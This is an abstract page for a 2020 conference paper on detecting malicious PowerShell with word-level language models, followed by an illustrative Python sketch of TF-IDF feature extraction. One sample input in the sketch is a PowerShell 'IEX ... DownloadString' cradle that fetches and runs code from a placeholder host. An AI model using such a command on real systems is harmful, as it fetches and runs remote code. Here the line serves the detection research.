Detection of Malicious PowerShell Using Word-Level Language Models

Tajiri, Yui; Mimura, Mamoru

doi:10.1007/978-3-030-58208-1_3

Part of the book series: Lecture Notes in Computer Science (LNCS, volume 12231)

Included in the following conference series:

International Workshop on Security

Abstract

Cybercriminals increasingly abuse legitimate tools already installed on target computers to carry out cyberattacks. In particular, abuse of PowerShell, which is provided by Microsoft, has been increasing every year and has become a threat. Previous studies proposed a method to detect malicious PowerShell commands using character-level deep learning. That method combines traditional natural language processing with character-level convolutional neural networks, but it requires time for dynamic analysis. This paper proposes a method to classify unknown PowerShell scripts without dynamic analysis. Our method classifies scripts using feature vectors extracted from malicious and benign PowerShell scripts with word-level language models. The datasets, which are imbalanced, were built from benign and malicious PowerShell scripts obtained from Hybrid Analysis and benign PowerShell scripts obtained from GitHub. The experimental results show that the combination of LSI and XGBoost produces the highest detection rate. The maximum accuracy reaches approximately 0.95 on the imbalanced dataset. Furthermore, over 50% of unknown malicious PowerShell scripts could be detected in time series analysis without dynamic analysis.
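
The abstract does not spell out how scripts are turned into word-level features, so the following is only a minimal sketch of one plausible first step: splitting PowerShell scripts into words and building TF-IDF weighted vectors, the kind of term-document input that a model such as LSI could reduce before a classifier such as XGBoost is trained. The tokenisation rule, the function names (`tokenize`, `build_vocabulary`, `tfidf_vectors`) and the two sample scripts are assumptions made for illustration, not the authors' implementation.

```python
import math
import re
from collections import Counter

# Hypothetical tokenisation rule (an assumption, not taken from the paper):
# a "word" is a run of letters, digits, underscores or hyphens, lower-cased
# because PowerShell identifiers are case-insensitive.
TOKEN_RE = re.compile(r"[A-Za-z0-9_-]+")


def tokenize(script):
    """Split a PowerShell script into lower-cased word tokens."""
    return [tok.lower() for tok in TOKEN_RE.findall(script)]


def build_vocabulary(token_lists):
    """Map each distinct word to a column index, in sorted order."""
    words = sorted({tok for toks in token_lists for tok in toks})
    return {word: i for i, word in enumerate(words)}


def tfidf_vectors(token_lists, vocab):
    """Return one TF-IDF weighted vector (a list of floats) per script."""
    n_docs = len(token_lists)
    # Document frequency: in how many scripts does each word occur?
    doc_freq = Counter(tok for toks in token_lists for tok in set(toks))
    vectors = []
    for toks in token_lists:
        vec = [0.0] * len(vocab)
        for word, count in Counter(toks).items():
            idf = math.log(n_docs / doc_freq[word])
            vec[vocab[word]] = count * idf
        vectors.append(vec)
    return vectors


# Two made-up scripts, used purely as illustrative input.
scripts = [
    "Get-ChildItem -Path C:\\Logs | Remove-Item",
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
]
tokens = [tokenize(s) for s in scripts]
vocab = build_vocabulary(tokens)
features = tfidf_vectors(tokens, vocab)
```

In this sketch each row of `features` is one script and each column is one word. A word that occurs in every script gets weight zero, so only words that distinguish scripts contribute. Keeping the whole pipeline static (no script is executed) mirrors the abstract's goal of avoiding dynamic analysis.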



Author information

Authors and Affiliations

National Defense Academy, Yokosuka, Japan
Yui Tajiri & Mamoru Mimura

Corresponding author

Correspondence to Yui Tajiri.

Editor information

Editors and Affiliations

Bunkyo University, Chigasaki, Japan
Kazumaro Aoki
Toho University, Funabashi, Japan
Akira Kanaoka

Cite this paper

Tajiri, Y., Mimura, M. (2020). Detection of Malicious PowerShell Using Word-Level Language Models. In: Aoki, K., Kanaoka, A. (eds) Advances in Information and Computer Security. IWSEC 2020. Lecture Notes in Computer Science, vol 12231. Springer, Cham. https://doi.org/10.1007/978-3-030-58208-1_3

DOI: https://doi.org/10.1007/978-3-030-58208-1_3
Published: 26 August 2020
Publisher Name: Springer, Cham
Print ISBN: 978-3-030-58207-4
Online ISBN: 978-3-030-58208-1
eBook Packages: Computer Science (R0)
